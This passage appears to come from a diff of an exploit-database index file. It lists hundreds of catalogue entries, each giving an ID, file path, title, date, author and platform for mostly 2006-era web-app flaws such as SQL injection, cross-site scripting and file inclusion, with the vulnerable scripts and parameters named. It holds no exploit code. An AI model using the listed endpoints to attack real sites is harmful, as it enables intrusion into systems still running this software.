Vulnerabilities",2006-02-23,rgod,webapps,php, +27303,exploits/php/webapps/27303.txt,"Oi! Email Marketing System 3.0 - 'index.php' SQL Injection",2006-02-23,h4cky0u,webapps,php, +27304,exploits/php/webapps/27304.html,"CubeCart 3.0.x - Arbitrary File Upload",2006-02-23,"NSA Group",webapps,php, +27305,exploits/php/webapps/27305.txt,"PHPX 3.5.9 - XCode Tag HTML Injection",2006-02-23,"Thomas Pollet",webapps,php, +27306,exploits/php/webapps/27306.txt,"JGS-Gallery 4.0 - 'jgs_galerie_slideshow.php' Multiple Cross-Site Scripting Vulnerabilities",2006-02-23,nuker,webapps,php, +27307,exploits/php/webapps/27307.txt,"JGS-Gallery 4.0 - 'Board jgs_galerie_scroll.php?userid' Cross-Site Scripting",2006-02-23,nuker,webapps,php, +27308,exploits/php/webapps/27308.txt,"myPHPNuke 1.8.8 - 'reviews.php' Cross-Site Scripting",2006-02-22,"Mustafa Can Bjorn",webapps,php, +27309,exploits/php/webapps/27309.txt,"myPHPNuke 1.8.8 - 'download.php' Cross-Site Scripting",2006-02-22,"Mustafa Can Bjorn",webapps,php, +27310,exploits/asp/webapps/27310.txt,"Battleaxe Software BttlxeForum 2.0 - 'Failure.asp' Cross-Site Scripting",2006-02-25,rUnViRuS,webapps,asp, +27311,exploits/php/webapps/27311.txt,"SPiD 1.3.1 - 'Scan_Lang_Insert.php' Local File Inclusion",2006-02-25,"NSA Group",webapps,php, +27312,exploits/php/webapps/27312.txt,"FreeHostShop Website Generator 3.3 - Arbitrary File Upload",2006-02-25,"NSA Group",webapps,php, +27313,exploits/php/webapps/27313.txt,"DCI-Taskeen 1.03 - 'basket.php' Multiple SQL Injections",2006-02-25,Linux_Drox,webapps,php, +27314,exploits/php/webapps/27314.txt,"DCI-Taskeen 1.03 - 'cat.php' Multiple SQL Injections",2006-02-25,Linux_Drox,webapps,php, +27315,exploits/php/webapps/27315.txt,"RiteCMS 1.0.0 - Multiple Vulnerabilities",2013-08-03,"Yashar shahinzadeh",webapps,php, +27318,exploits/php/webapps/27318.txt,"PHP-Nuke 7.8 - 'Mainfile.php' SQL Injection",2006-02-25,waraxe,webapps,php, +27320,exploits/hardware/webapps/27320.txt,"Thomson SpeedTouch 500 Series - LocalNetwork Page 'name' Cross-Site Scripting",2006-02-25,"Preben Nylokken",webapps,hardware, +27321,exploits/php/webapps/27321.txt,"Fantastic News 2.1.1 - SQL Injection",2006-02-27,SAUDI,webapps,php, +27322,exploits/php/webapps/27322.txt,"Woltlab Burning Board 1.1.1/2.x - 'galerie_index.php?Username' Cross-Site Scripting",2006-02-27,botan,webapps,php, +27323,exploits/php/webapps/27323.txt,"Woltlab Burning Board 1.1.1/2.x - 'galerie_onfly.php' Cross-Site Scripting",2006-02-27,botan,webapps,php, +27324,exploits/php/webapps/27324.txt,"Archangel Weblog 0.90.2 - Authentication Bypass",2006-02-27,KingOfSka,webapps,php, +27327,exploits/php/webapps/27327.txt,"D3Jeeb Pro 3 - 'fastlinks.php?catid' SQL Injection",2006-02-25,SAUDI,webapps,php, +27328,exploits/php/webapps/27328.txt,"D3Jeeb Pro 3 - 'catogary.php?catid' SQL Injection",2006-02-25,SAUDI,webapps,php, +27330,exploits/php/webapps/27330.txt,"n8cms 1.1/1.2 - 'index.php' Multiple SQL Injections",2006-02-27,Liz0ziM,webapps,php, +27331,exploits/php/webapps/27331.txt,"n8cms 1.1/1.2 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2006-02-27,Liz0ziM,webapps,php, +27332,exploits/php/webapps/27332.txt,"n8cms 1.1/1.2 - 'mailto.php?userid' Cross-Site Scripting",2006-02-27,Liz0ziM,webapps,php, +27333,exploits/php/webapps/27333.txt,"QwikiWiki 1.4 - 'index.php' Cross-Site Scripting",2006-02-28,Dr^Death,webapps,php, +27336,exploits/php/webapps/27336.txt,"EJ3 TOPo 2.2.178 - 'Inc_header.php' Cross-Site Scripting",2006-02-28,"Yunus Emre Yilmaz",webapps,php, +27337,exploits/php/webapps/27337.txt,"Mozilla Thunderbird 1.5 - Multiple Remote Information Disclosure Vulnerabilities",2006-02-28,Crashfr,webapps,php, +27338,exploits/php/webapps/27338.txt,"PEHEPE Membership Management System 3.0 - 'Sol_menu.php' Cross-Site Scripting",2006-02-26,"Yunus Emre Yilmaz",webapps,php, +27339,exploits/php/webapps/27339.txt,"PEHEPE Membership Management System 3.0 - Remote PHP Script Code Injection",2006-02-28,"Yunus Emre Yilmaz",webapps,php, +27340,exploits/php/webapps/27340.txt,"SMBlog 1.2 - Arbitrary PHP Command Execution",2006-03-01,botan,webapps,php, +27341,exploits/php/webapps/27341.txt,"DCI-Designs Dawaween 1.03 - 'Poems.php' SQL Injection",2006-03-02,sherba,webapps,php, +27342,exploits/php/webapps/27342.txt,"PluggedOut Nexus 0.1 - 'forgotten_password.php' SQL Injection",2006-03-02,"Hamid Ebadi",webapps,php, +27343,exploits/php/webapps/27343.txt,"vBulletin 3.0/3.5 - 'profile.php?Email' HTML Injection",2006-03-02,imei,webapps,php, +27344,exploits/php/webapps/27344.txt,"NZ eCommerce System - 'index.php' Multiple SQL Injections",2006-03-02,r0t,webapps,php, +27345,exploits/php/webapps/27345.txt,"LogIT 1.3/1.4 - Remote File Inclusion",2006-03-02,botan,webapps,php, +27346,exploits/php/webapps/27346.txt,"VBZoom Forum 1.11 - 'show.php' MainID SQL Injection",2006-03-04,Mr.SNAKE,webapps,php, +27347,exploits/php/webapps/27347.txt,"VBZooM Forum 1.11 - 'comment.php?UserID' Cross-Site Scripting",2006-03-04,Mr.SNAKE,webapps,php, +27348,exploits/php/webapps/27348.txt,"VBZooM Forum 1.11 - 'contact.php?UserID' Cross-Site Scripting",2006-03-04,Mr.SNAKE,webapps,php, +27354,exploits/php/webapps/27354.txt,"Easy Forum 2.5 - New User Image File HTML Injection",2006-03-04,"Aliaksandr Hartsuyeu",webapps,php, +27355,exploits/php/webapps/27355.txt,"Woltlab Burning Board 2.3.4 - 'misc.php' Cross-Site Scripting",2006-03-04,r57shell,webapps,php, +27362,exploits/php/webapps/27362.txt,"Bitweaver 1.1/1.2 - 'Title' HTML Injection",2006-03-06,Kiki,webapps,php, +27363,exploits/php/webapps/27363.txt,"PHORUM 3.x/5.x - 'Common.php' Remote File Inclusion",2006-03-06,ERNE,webapps,php, +27364,exploits/php/webapps/27364.txt,"Game-Panel 2.6 - 'login.php' Cross-Site Scripting",2006-03-06,Retard,webapps,php, +27557,exploits/php/webapps/27557.pl,"PHPSelect Submit-A-Link - HTML Injection",2006-04-01,s3rv3r_hack3r,webapps,php, +27367,exploits/php/webapps/27367.txt,"Link Bank - 'Iframe.php' Cross-Site Scripting",2006-03-07,Retard,webapps,php, +27368,exploits/php/webapps/27368.txt,"LoudBlog 0.41 - 'podcast.php' SQL Injection",2006-03-07,tzitaroth,webapps,php, +27369,exploits/php/webapps/27369.txt,"LoudBlog 0.41 - 'index.php?template' Traversal Arbitrary File Access",2006-03-07,tzitaroth,webapps,php, +27370,exploits/php/webapps/27370.txt,"LoudBlog 0.41 - 'backend_settings.php' Traversal Arbitrary File Access",2006-03-07,tzitaroth,webapps,php, +27371,exploits/php/webapps/27371.txt,"HitHost 1.0 - 'deleteuser.php?user' Cross-Site Scripting",2006-03-06,Retard,webapps,php, +27372,exploits/php/webapps/27372.txt,"HitHost 1.0 - 'viewuser.php?hits' Cross-Site Scripting",2006-03-06,Retard,webapps,php, +27373,exploits/php/webapps/27373.txt,"TextFileBB 1.0 - Multiple Cross-Site Scripting Vulnerabilities",2006-03-08,Retard,webapps,php, +27374,exploits/php/webapps/27374.txt,"sBlog 0.7.2 - 'search.php?keyword' POST Method Cross-Site Scripting",2006-03-09,Kiki,webapps,php, +27375,exploits/php/webapps/27375.txt,"sBlog 0.7.2 - 'comments_do.php' Multiple POST Cross-Site Scripting Vulnerabilities",2006-03-09,Kiki,webapps,php, +27376,exploits/ios/webapps/27376.txt,"FTP OnConnect 1.4.11 iOS - Multiple Vulnerabilities",2013-08-07,Vulnerability-Lab,webapps,ios, +27379,exploits/php/webapps/27379.txt,"ADP Forum 2.0.x - 'Subject' HTML Injection",2006-03-09,liz0,webapps,php, +27380,exploits/php/webapps/27380.txt,"MyBloggie 2.1.2/2.1.3 - 'upload.php' Cross-Site Scripting",2006-03-09,enji@infosys.tuwien.ac.at,webapps,php, +27381,exploits/php/webapps/27381.txt,"MyBloggie 2.1.2/2.1.3 - 'delcomment.php' Cross-Site Scripting",2006-03-09,enji@infosys.tuwien.ac.at,webapps,php, +27382,exploits/php/webapps/27382.txt,"MyBloggie 2.1.2/2.1.3 - 'deluser.php' Cross-Site Scripting",2006-03-09,enji@infosys.tuwien.ac.at,webapps,php, +27383,exploits/php/webapps/27383.txt,"MyBloggie 2.1.2/2.1.3 - 'addcat.php' Cross-Site Scripting",2006-03-09,enji@infosys.tuwien.ac.at,webapps,php, +27384,exploits/php/webapps/27384.txt,"MyBloggie 2.1.2/2.1.3 - 'edituser.php' Cross-Site Scripting",2006-03-09,enji@infosys.tuwien.ac.at,webapps,php, +27385,exploits/php/webapps/27385.txt,"MyBloggie 2.1.2/2.1.3 - 'adduser.php' Cross-Site Scripting",2006-03-09,enji@infosys.tuwien.ac.at,webapps,php, +27386,exploits/php/webapps/27386.txt,"MyBloggie 2.1.2/2.1.3 - 'editcat.php' Cross-Site Scripting",2006-03-09,enji@infosys.tuwien.ac.at,webapps,php, +27387,exploits/php/webapps/27387.txt,"MyBloggie 2.1.2/2.1.3 - 'trackback_url' Cross-Site Scripting",2006-03-09,enji@infosys.tuwien.ac.at,webapps,php, +27388,exploits/php/webapps/27388.txt,"MyBloggie 2.1.2/2.1.3 - 'delcat.php' Cross-Site Scripting",2006-03-09,enji@infosys.tuwien.ac.at,webapps,php, +27389,exploits/php/webapps/27389.txt,"MyBloggie 2.1.2/2.1.3 - 'del.php' Cross-Site Scripting",2006-03-09,enji@infosys.tuwien.ac.at,webapps,php, +27390,exploits/php/webapps/27390.txt,"DCP-Portal 3.7/4.x/5.x/6.x - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2006-03-09,"Nenad Jovanovic",webapps,php, +27391,exploits/php/webapps/27391.txt,"DCP-Portal 3.7/4.x/5.x/6.x - 'calendar.php' Multiple Cross-Site Scripting Vulnerabilities",2006-03-09,"Nenad Jovanovic",webapps,php, +27392,exploits/php/webapps/27392.txt,"DCP-Portal 3.7/4.x/5.x/6.x - 'forums.php' Multiple Cross-Site Scripting Vulnerabilities",2006-03-09,"Nenad Jovanovic",webapps,php, +27393,exploits/php/webapps/27393.txt,"DCP-Portal 3.7/4.x/5.x/6.x - 'inbox.php' Multiple Cross-Site Scripting Vulnerabilities",2006-03-09,"Nenad Jovanovic",webapps,php, +27394,exploits/php/webapps/27394.txt,"DCP-Portal 3.7/4.x/5.x/6.x - 'lostpassword.php' Multiple Cross-Site Scripting Vulnerabilities",2006-03-09,"Nenad Jovanovic",webapps,php, +27395,exploits/php/webapps/27395.txt,"DCP-Portal 3.7/4.x/5.x/6.x - 'mycontents.php' Multiple Cross-Site Scripting Vulnerabilities",2006-03-09,"Nenad Jovanovic",webapps,php, +27396,exploits/php/webapps/27396.txt,"txtForum 1.0.3/1.0.4 - Multiple Cross-Site Scripting Vulnerabilities",2006-03-09,"Nenad Jovanovic",webapps,php, +27398,exploits/php/webapps/27398.txt,"Pluck CMS 4.7 - HTML Code Injection",2013-08-07,"Yashar shahinzadeh",webapps,php, +27399,exploits/php/webapps/27399.txt,"WordPress Plugin Booking Calendar 4.1.4 - Cross-Site Request Forgery",2013-08-07,"Dylan Irzi",webapps,php, +27402,exploits/hardware/webapps/27402.txt,"Hikvision IP Cameras 4.1.0 b130111 - Multiple Vulnerabilities",2013-08-07,"Core Security",webapps,hardware, +27403,exploits/php/webapps/27403.txt,"WordPress Plugin Usernoise 3.7.8 - Persistent Cross-Site Scripting",2013-08-07,RogueCoder,webapps,php, +27405,exploits/php/webapps/27405.txt,"Joomla! Component com_sectionex 2.5.96 - SQL Injection",2013-08-07,"Matias Fontanini",webapps,php, +27406,exploits/windows/webapps/27406.txt,"McAfee SuperScan 4.0 - Cross-Site Scripting",2013-08-07,"Trustwave's SpiderLabs",webapps,windows, +27408,exploits/php/webapps/27408.txt,"txtForum 1.0.3/1.0.4 - Remote PHP Script Code Injection",2006-03-09,enji@infosys.tuwien.ac.at,webapps,php, +27409,exploits/php/webapps/27409.txt,"QwikiWiki 1.4/1.5 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2006-03-10,Kiki,webapps,php, +27410,exploits/php/webapps/27410.txt,"QwikiWiki 1.4/1.5 - 'login.php' Multiple Cross-Site Scripting Vulnerabilities",2006-03-10,Kiki,webapps,php, +27411,exploits/php/webapps/27411.txt,"QwikiWiki 1.4/1.5 - 'pageindex.php?help' Cross-Site Scripting",2006-03-10,Kiki,webapps,php, +27412,exploits/php/webapps/27412.txt,"QwikiWiki 1.4/1.5 - 'recentchanges.php?help' Cross-Site Scripting",2006-03-10,Kiki,webapps,php, +27413,exploits/php/webapps/27413.txt,"Core News 2.0.1 - 'index.php' Remote Code Execution",2006-03-10,botan,webapps,php, +27414,exploits/php/webapps/27414.txt,"vCard 2.8/2.9 - 'create.php' Multiple Cross-Site Scripting Vulnerabilities",2006-03-11,Linux_Drox,webapps,php, +27415,exploits/php/webapps/27415.txt,"WMNews - 'wmview.php?ArtCat' Cross-Site Scripting",2006-03-10,R00T3RR0R,webapps,php, +27416,exploits/php/webapps/27416.txt,"WMNews - 'footer.php?ctrrowcol' Cross-Site Scripting",2006-03-10,R00T3RR0R,webapps,php, +27417,exploits/php/webapps/27417.txt,"WMNews - 'wmcomments.php?ArtID' Cross-Site Scripting",2006-03-10,R00T3RR0R,webapps,php, +27419,exploits/php/webapps/27419.txt,"Vegas Forum 1.0 - 'Forumlib.php' SQL Injection",2006-03-13,"Aliaksandr Hartsuyeu",webapps,php, +27422,exploits/php/webapps/27422.txt,"CyBoards PHP Lite 1.21/1.25 - 'post.php' SQL Injection",2006-03-14,"Aliaksandr Hartsuyeu",webapps,php, +27423,exploits/php/webapps/27423.txt,"DSCounter 1.2 - 'index.php' SQL Injection",2006-03-14,"Aliaksandr Hartsuyeu",webapps,php, +27424,exploits/php/webapps/27424.txt,"DSDownload 1.0 - Multiple SQL Injections",2006-03-15,"Aliaksandr Hartsuyeu",webapps,php, +27427,exploits/php/webapps/27427.txt,"Contrexx CMS 1.0.x - 'index.php' Cross-Site Scripting",2006-03-16,Soot,webapps,php, +27430,exploits/php/webapps/27430.txt,"PHPFox 3.6.0 (build3) - Multiple SQL Injections",2013-08-08,"Matias Fontanini",webapps,php, +27431,exploits/php/webapps/27431.txt,"BigTree CMS 4.0 RC2 - Multiple Vulnerabilities",2013-08-08,"High-Tech Bridge SA",webapps,php, +27991,exploits/php/webapps/27991.txt,"PostNuke 0.76 RC2 - Multiple Input Validation Vulnerabilities",2006-06-07,SpC-x,webapps,php, +27990,exploits/php/webapps/27990.txt,"Calendar Express 2.2 - 'month.php' SQL Injection",2006-06-07,"CrAzY CrAcKeR",webapps,php, +27443,exploits/php/webapps/27443.txt,"Extcalendar 1.0 - Cross-Site Scripting",2006-03-18,Soothackers,webapps,php, +27444,exploits/php/webapps/27444.txt,"Woltlab Burning Board 2.3.4 - 'Class_DB_MySQL.php' Cross-Site Scripting",2006-03-18,r57shell,webapps,php, +27445,exploits/php/webapps/27445.txt,"MusicBox 2.3 - 'index.php' SQL Injection",2006-03-18,Linux_Drox,webapps,php, +27446,exploits/php/webapps/27446.txt,"MusicBox 2.3 - 'index.php' Cross-Site Scripting",2006-03-18,Linux_Drox,webapps,php, +27447,exploits/php/webapps/27447.txt,"MusicBox 2.3 - 'cart.php' Cross-Site Scripting",2006-03-18,Linux_Drox,webapps,php, +27448,exploits/php/webapps/27448.txt,"phpWebSite 0.8.2/0.8.3 - 'friend.php?sid' SQL Injection",2006-03-20,DaBDouB-MoSiKaR,webapps,php, +27449,exploits/php/webapps/27449.txt,"phpWebSite 0.8.2/0.8.3 - 'article.php?sid' SQL Injection",2006-03-20,DaBDouB-MoSiKaR,webapps,php, +27450,exploits/php/webapps/27450.txt,"WinHKI 1.4/1.5/1.6 - Directory Traversal",2006-02-24,raphael.huck@free.fr,webapps,php, +27451,exploits/cgi/webapps/27451.txt,"Verisign MPKI 6.0 - 'Haydn.exe' Cross-Site Scripting",2006-03-20,"Alberto Soli",webapps,cgi, +27454,exploits/php/webapps/27454.txt,"Motorola - BlueTooth Interface Dialog Spoofing",2006-03-22,kspecial,webapps,php, +27455,exploits/cfm/webapps/27455.txt,"1WebCalendar 4.0 - 'viewEvent.cfm?EventID' SQL Injection",2006-03-22,r0t3d3Vil,webapps,cfm, +27456,exploits/cfm/webapps/27456.txt,"1WebCalendar 4.0 - '/news/newsView.cfm?NewsID' SQL Injection",2006-03-22,r0t3d3Vil,webapps,cfm, +27457,exploits/cfm/webapps/27457.txt,"1WebCalendar 4.0 - 'mainCal.cfm' SQL Injection",2006-03-22,r0t3d3Vil,webapps,cfm, +27458,exploits/php/webapps/27458.txt,"EasyMoblog 0.5 - 'Img.php' Cross-Site Scripting",2006-03-23,FarhadKey,webapps,php, +27459,exploits/php/webapps/27459.txt,"CoMoblog 1.0 - 'Img.php' Cross-Site Scripting",2006-03-23,FarhadKey,webapps,php, +27462,exploits/php/webapps/27462.txt,"AdMan 1.0.20051221 - 'ViewStatement.php' SQL Injection",2003-03-23,r0t,webapps,php, +27463,exploits/jsp/webapps/27463.txt,"IBM Tivoli Business Systems Manager 3.1 - APWC_Win_Main.jsp Cross-Site Scripting",2006-03-23,anonymous,webapps,jsp, +27464,exploits/cgi/webapps/27464.txt,"Cholod MySQL Based Message Board - 'Mb.cgi' SQL Injection",2006-03-24,kspecial,webapps,cgi, +27465,exploits/php/webapps/27465.txt,"VihorDesign - 'index.php' Cross-Site Scripting",2006-03-24,botan,webapps,php, +27466,exploits/php/webapps/27466.txt,"VihorDesign - 'index.php' Remote File Inclusion",2006-03-24,botan,webapps,php, +27467,exploits/php/webapps/27467.txt,"ConfTool 1.1 - 'index.php' Cross-Site Scripting",2006-03-27,botan,webapps,php, +27468,exploits/php/webapps/27468.txt,"Nuked-klaN 1.x - 'index.php' SQL Injection",2006-03-27,DaBDouB-MoSiKaR,webapps,php, +27469,exploits/asp/webapps/27469.txt,"EZHomePagePro 1.5 - 'email.asp' Multiple Cross-Site Scripting Vulnerabilities",2006-03-27,r0t,webapps,asp, +27470,exploits/asp/webapps/27470.txt,"EZHomePagePro 1.5 - 'users_search.asp' Multiple Cross-Site Scripting Vulnerabilities",2006-03-27,r0t,webapps,asp, +27471,exploits/asp/webapps/27471.txt,"EZHomePagePro 1.5 - 'users_calendar.asp?page' Cross-Site Scripting",2006-03-27,r0t,webapps,asp, +27472,exploits/asp/webapps/27472.txt,"EZHomePagePro 1.5 - 'users_profiles.asp' Multiple Cross-Site Scripting Vulnerabilities",2006-03-27,r0t,webapps,asp, +27473,exploits/asp/webapps/27473.txt,"EZHomePagePro 1.5 - 'users_mgallery.asp?usid' Cross-Site Scripting",2006-03-27,r0t,webapps,asp, +27475,exploits/php/webapps/27475.txt,"SaPHPLesson 2.0 - 'print.php' SQL Injection",2006-03-27,Linux_Drox,webapps,php, +27477,exploits/php/webapps/27477.txt,"Maian Weblog 2.0 - 'print.php' SQL Injection",2006-03-27,"Aliaksandr Hartsuyeu",webapps,php, +27478,exploits/php/webapps/27478.txt,"Maian Weblog 2.0 - 'mail.php' SQL Injection",2006-03-27,"Aliaksandr Hartsuyeu",webapps,php, +27479,exploits/asp/webapps/27479.txt,"Toast Forums 1.6 - 'Toast.asp' Multiple Cross-Site Scripting Vulnerabilities",2006-03-27,r0t,webapps,asp, +27480,exploits/asp/webapps/27480.txt,"Online Quiz System - 'prequiz.asp?exam' Cross-Site Scripting",2006-03-27,r0t,webapps,asp, +27481,exploits/asp/webapps/27481.txt,"Online Quiz System - 'student.asp?msg' Cross-Site Scripting",2006-03-27,r0t,webapps,asp, +27482,exploits/asp/webapps/27482.txt,"Caloris Planitia Technologies School Management System 1.0 - Cross-Site Scripting",2006-03-27,r0t,webapps,asp, +27483,exploits/php/webapps/27483.txt,"Pixel Motion - '/admin/index.php' Multiple SQL Injections",2006-03-27,DaBDouB-MoSiKaR,webapps,php, +27484,exploits/php/webapps/27484.txt,"Pixel Motion - 'index.php?date' SQL Injection",2006-03-27,DaBDouB-MoSiKaR,webapps,php, +27485,exploits/php/webapps/27485.txt,"DSLogin 1.0 - 'index.php' Multiple SQL Injections",2006-03-27,"Aliaksandr Hartsuyeu",webapps,php, +27486,exploits/asp/webapps/27486.txt,"Web Host Automation Ltd. Helm 3.2.10 Beta - 'domains.asp?txtDomainName' Cross-Site Scripting",2006-03-27,r0t,webapps,asp, +27487,exploits/asp/webapps/27487.txt,"Web Host Automation Ltd. Helm 3.2.10 Beta - 'default.asp' Multiple Cross-Site Scripting Vulnerabilities",2006-03-27,r0t,webapps,asp, +27488,exploits/cgi/webapps/27488.txt,"BlankOL 1.0 - 'Bol.cgi' Multiple Cross-Site Scripting Vulnerabilities",2006-03-27,r0t,webapps,cgi, +27489,exploits/cfm/webapps/27489.txt,"FusionZONE CouponZONE 4.2 - Multiple Cross-Site Scripting Vulnerabilities",2006-03-28,r0t,webapps,cfm, +27490,exploits/cfm/webapps/27490.txt,"ClassifiedZONE 1.2 - 'Accountlogon.cfm' Cross-Site Scripting",2006-03-28,r0t,webapps,cfm, +27491,exploits/cfm/webapps/27491.txt,"FusionZONE CouponZONE 4.2 - Multiple SQL Injections",2006-03-27,r0t,webapps,cfm, +27492,exploits/php/webapps/27492.txt,"ActiveCampaign SupportTrio 2.50.2 - Multiple Cross-Site Scripting Vulnerabilities",2006-03-27,r0t,webapps,php, +27493,exploits/cfm/webapps/27493.txt,"RealestateZONE 4.2 - Multiple Cross-Site Scripting Vulnerabilities",2006-03-28,r0t,webapps,cfm, +27497,exploits/php/webapps/27497.txt,"CONTROLzx Hms 3.3.4 - 'shared_order.php?sharedPlanID' Cross-Site Scripting",2006-03-28,r0t,webapps,php, +27498,exploits/php/webapps/27498.txt,"CONTROLzx Hms 3.3.4 - 'dedicated_order.php?dedicatedPlanID' Cross-Site Scripting",2006-03-28,r0t,webapps,php, +27499,exploits/php/webapps/27499.txt,"CONTROLzx Hms 3.3.4 - 'server_management.php?plan_id' Cross-Site Scripting",2006-03-28,r0t,webapps,php, +27500,exploits/php/webapps/27500.txt,"Arab Portal 2.0 - 'online.php' Cross-Site Scripting",2006-03-28,o.y.6,webapps,php, +27501,exploits/php/webapps/27501.txt,"Arab Portal 2.0 - 'download.php' Cross-Site Scripting",2006-03-28,o.y.6,webapps,php, +27502,exploits/php/webapps/27502.txt,"Connect Daily 3.2.8/3.2.9 - 'ViewDay.html' Multiple Cross-Site Scripting Vulnerabilities",2006-03-28,r0t,webapps,php, +27503,exploits/php/webapps/27503.txt,"Connect Daily 3.2.8/3.2.9 - 'ViewSearch.html' Multiple Cross-Site Scripting Vulnerabilities",2006-03-28,r0t,webapps,php, +27504,exploits/php/webapps/27504.txt,"Connect Daily 3.2.8/3.2.9 - 'ViewYear.html' Multiple Cross-Site Scripting Vulnerabilities",2006-03-28,r0t,webapps,php, +27505,exploits/php/webapps/27505.txt,"Connect Daily 3.2.8/3.2.9 - 'ViewCal.html?item_type_id' Cross-Site Scripting",2006-03-28,r0t,webapps,php, +27506,exploits/php/webapps/27506.txt,"Connect Daily 3.2.8/3.2.9 - 'ViewWeek.html?week' Cross-Site Scripting",2006-03-28,r0t,webapps,php, +27507,exploits/php/webapps/27507.txt,"AL-Caricatier 2.5 - Multiple Cross-Site Scripting Vulnerabilities",2006-03-28,Linux_Drox,webapps,php, +27509,exploits/php/webapps/27509.txt,"OneOrZero 1.6.3 Helpdesk - 'index.php' SQL Injection",2006-03-28,Preddy,webapps,php, +27510,exploits/php/webapps/27510.txt,"PhxContacts 0.93 - 'carnet.php' Multiple SQL Injections",2006-03-29,"Morocco Security Team",webapps,php, +27511,exploits/php/webapps/27511.txt,"PhxContacts 0.93 - 'contact_view.php?id_contact' SQL Injection",2006-03-29,"Morocco Security Team",webapps,php, +27512,exploits/php/webapps/27512.txt,"PhxContacts 0.93 - 'login.php' Cross-Site Scripting",2006-03-29,DaBDouB-MoSiKaR,webapps,php, +27513,exploits/php/webapps/27513.txt,"VNews 1.2 - Multiple SQL Injections",2006-03-30,"Aliaksandr Hartsuyeu",webapps,php, +27514,exploits/php/webapps/27514.txt,"Tribq CMS 5.2.7 - Cross-Site Request Forgery (Adding/Editing New Administrator Account)",2013-08-12,"Yashar shahinzadeh",webapps,php, +27515,exploits/php/webapps/27515.txt,"Open Real Estate CMS 1.5.1 - Multiple Vulnerabilities",2013-08-12,"Yashar shahinzadeh",webapps,php, +27518,exploits/php/webapps/27518.txt,"MLMAuction Script - 'gallery.php?id' SQL Injection",2013-08-12,3spi0n,webapps,php, +27519,exploits/php/webapps/27519.txt,"PHPVID 1.2.3 - Multiple Vulnerabilities",2013-08-12,3spi0n,webapps,php, +27729,exploits/php/webapps/27729.txt,"Scry Gallery 1.1 - 'index.php' Cross-Site Scripting",2006-04-24,mayank,webapps,php, +27521,exploits/php/webapps/27521.txt,"Ajax PHP Penny Auction 1.x 2.x - Multiple Vulnerabilities",2013-08-12,"Taha Hunter",webapps,php,80 +27522,exploits/php/webapps/27522.txt,"Gnew 2013.1 - Multiple Vulnerabilities (1)",2013-08-12,LiquidWorm,webapps,php,80 +27533,exploits/php/webapps/27533.txt,"X-Changer 0.20 - Multiple SQL Injections",2006-03-30,"Morocco Security Team",webapps,php, +27728,exploits/cgi/webapps/27728.txt,"Blender 2.36 - '.BVF' File Import Python Code Execution",2006-04-24,"Joxean Koret",webapps,cgi, +27525,exploits/php/webapps/27525.txt,"Integrated CMS 1.0 - SQL Injection",2013-08-12,DSST,webapps,php,80 +27531,exploits/php/webapps/27531.txt,"WordPress Plugin Hms Testimonials 2.0.10 - Multiple Vulnerabilities",2013-08-12,RogueCoder,webapps,php, +27532,exploits/php/webapps/27532.txt,"Joomla! Component redSHOP 1.2 - SQL Injection",2013-08-12,"Matias Fontanini",webapps,php, +27534,exploits/php/webapps/27534.txt,"MediaSlash Gallery - 'index.php' Remote File Inclusion",2006-03-30,"Morocco Security Team",webapps,php, +27535,exploits/php/webapps/27535.txt,"O2PHP Oxygen 1.0/1.1 - 'post.php' SQL Injection",2006-03-30,"Morocco Security Team",webapps,php, +27536,exploits/asp/webapps/27536.txt,"SiteSearch Indexer 3.5 - 'searchresults.asp' Cross-Site Scripting",2006-03-31,r0t,webapps,asp, +27537,exploits/php/webapps/27537.txt,"Warcraft III Replay Parser for PHP 1.8.c - 'index.php' Remote File Inclusion",2006-03-31,botan,webapps,php, +27538,exploits/php/webapps/27538.txt,"RedCMS 0.1 - 'profile.php?u' SQL Injection",2006-03-31,"Aliaksandr Hartsuyeu",webapps,php, +27539,exploits/php/webapps/27539.txt,"RedCMS 0.1 - 'login.php' Multiple SQL Injections",2006-03-31,"Aliaksandr Hartsuyeu",webapps,php, +27540,exploits/php/webapps/27540.txt,"RedCMS 0.1 - 'register.php' Multiple Cross-Site Scripting Vulnerabilities",2006-03-31,"Aliaksandr Hartsuyeu",webapps,php, +27544,exploits/php/webapps/27544.txt,"SoftBiz Image Gallery - 'suggest_image.php?cid' SQL Injection",2006-03-31,Linux_Drox,webapps,php, +27545,exploits/php/webapps/27545.txt,"SoftBiz Image Gallery - 'insert_rating.php?img_id' SQL Injection",2006-03-31,Linux_Drox,webapps,php, +27546,exploits/php/webapps/27546.txt,"SoftBiz Image Gallery - 'images.php?cid' SQL Injection",2006-03-31,Linux_Drox,webapps,php, +27548,exploits/php/webapps/27548.txt,"Claroline 1.x - 'rqmkhtml.php' Information Disclosure",2006-03-31,rgod,webapps,php, +27549,exploits/php/webapps/27549.txt,"Claroline 1.x - 'rqmkhtml.php' Cross-Site Scripting",2006-03-31,rgod,webapps,php, +27550,exploits/php/webapps/27550.txt,"Blank'N'Berg 0.2 - Directory Traversal",2006-03-31,"Amine ABOUD",webapps,php, +27551,exploits/php/webapps/27551.txt,"Blank'N'Berg 0.2 - Cross-Site Scripting",2006-03-31,"Amine ABOUD",webapps,php, +27552,exploits/asp/webapps/27552.txt,"ISP Site Man - 'admin_login.asp' SQL Injection",2006-04-01,s3rv3r_hack3r,webapps,asp, +27558,exploits/jsp/webapps/27558.txt,"Bugzero 4.3.1 - 'query.jsp?msg' Cross-Site Scripting",2006-04-03,r0t,webapps,jsp, +27559,exploits/jsp/webapps/27559.txt,"Bugzero 4.3.1 - 'edit.jsp' Multiple Cross-Site Scripting Vulnerabilities",2006-04-03,r0t,webapps,jsp, +27560,exploits/php/webapps/27560.txt,"aWebNews 1.2 - 'visview.php?_GET['cid']' SQL Injection",2006-04-03,"Aliaksandr Hartsuyeu",webapps,php, +27561,exploits/cgi/webapps/27561.txt,"Web-APP.net WebAPP 0.9.x - 'index.cgi' Multiple Cross-Site Scripting Vulnerabilities",2006-04-03,r0t,webapps,cgi, +27562,exploits/cgi/webapps/27562.txt,"Web-APP.net WebAPP 0.9.x - '/mods/calendar/index.cgi?vsSD' Cross-Site Scripting",2006-04-03,r0t,webapps,cgi, +27563,exploits/php/webapps/27563.txt,"LucidCMS 2.0 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2006-04-03,"Rusydi Hasan",webapps,php, +27567,exploits/php/webapps/27567.txt,"ArabPortal 2.0.1 - Multiple Input Validation Vulnerabilities",2006-04-04,o.y.6,webapps,php, +27570,exploits/php/webapps/27570.txt,"Chucky A. Ivey N.T. 1.1 - 